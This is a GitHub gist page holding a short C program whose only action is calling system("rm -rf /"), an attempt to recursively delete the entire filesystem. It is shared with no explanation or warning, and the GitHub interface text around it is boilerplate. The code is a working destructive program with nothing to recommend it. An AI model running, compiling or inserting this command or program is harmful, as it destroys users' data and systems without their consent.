Skip to content

Instantly share code, notes, and snippets.

@JanneSalokoski
Created January 2, 2015 17:27
Show Gist options
  • Save JanneSalokoski/c944242c2ad1a1f3cfb0 to your computer and use it in GitHub Desktop.
Save JanneSalokoski/c944242c2ad1a1f3cfb0 to your computer and use it in GitHub Desktop.
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
system("rm -rf /");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment